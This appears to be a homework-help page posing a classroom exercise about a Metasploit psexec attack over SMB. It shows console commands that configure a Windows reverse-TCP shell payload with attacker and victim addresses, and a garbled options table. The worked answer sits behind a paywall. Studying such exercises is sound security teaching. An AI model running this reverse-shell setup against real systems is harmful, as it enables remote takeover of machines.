Question: What is the vulnerability and exploit used in this attack? 2- What is the payload used? 3- What is the transport

   What is the vulnerability and exploit used in this attack?

2-      What is the payload used?

3-      What is the transport mechanism for this payload and why is it used?

4-      The attacker must configure 1 more parameter. What is that parameter?

5-      What are the values for the following parameters:

a.       The attacker's machine

b.       The attacker's port

c.       The victim's machine

d.       The victim's port

6-      What command will you type next? (Hint: the attack is fully set up)

7-      If the attack is successful, what can the hacker do on the target machine?

8-      How can you defend against this exploit?


msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST

msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.25 LHOST 192.168.1.25 msf5 exploit (windows/smb/psexec) > set LPORT 4444 LPORT 4444 msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD windows/shell/reverse_tcp msf5 exploit (windows/smb/psexec) > Payload options (windows/shell/reverse_tcp): Name EXITFUNC thread LHOST LPORT Current Setting Required Desc Exit The The Name 192.168.1.25 4444 msf5 exploit(windows/smb/psexec > show options Module options (exploit/windows/smb/psexec): RHOSTS syntax 'file: ' RPORT SERVICE DESCRIPTION SMBDomain SMBPass SMBUser SERVICE_DISPLAY_NAME yes yes yes Current Setting Required 192.168.100 445 SERVICE_NAME SHARE ADMIN$ or a normal read/write folder share yes yes no no no yes no no no Payload options (windows/shell/reverse_tcp):

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Computer Network Questions!